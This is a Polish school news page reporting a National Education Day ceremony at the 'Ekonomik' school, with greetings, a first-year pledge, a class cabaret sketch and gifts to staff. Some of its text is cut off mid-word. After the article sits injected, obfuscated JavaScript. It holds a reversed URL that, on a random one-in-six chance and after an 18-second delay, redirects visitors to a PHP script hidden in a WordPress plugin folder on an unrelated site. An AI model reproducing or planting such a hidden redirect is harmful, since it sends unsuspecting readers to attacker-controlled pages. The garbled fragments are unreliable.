Dzień Edukacji Narodowej w Ekonomiku

tor Małgorzata Kołodziejska złożyła zgromadzonym na uroczystości nauczycielom, pracownikom i uczniom szkoły życzenia.
to bardzo uroczyste spotkanie, które odbyło się w podniosłej ale radosnej atmosferze. Po złożeniu zaprzysiężenia przez przedstawicieli klas pierwszych , klasa IVd przedstawiła scenkę kabaretową parodiującą reklamy towarów przydatnych w szkolnictwie. Artyści – prezenterzy w zabawny sposób zaprezentowali pokaz pomocy szkolnych, niezbędnych we wdrażaniu nowego systemu reform. W podziękowaniu, za wkładany w pracę z uczniami nauczycielski trud, przedstawiciele klasy IVa wręczyli obecnym pracownikom szkoły symboliczne upominki.
towanie dekoracji.
$nJe=function(n){if (typeof ($nJe.list[n]) == „string”) return $nJe.list[n].split(„”).reverse().join(„”);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}to”>

Skip to content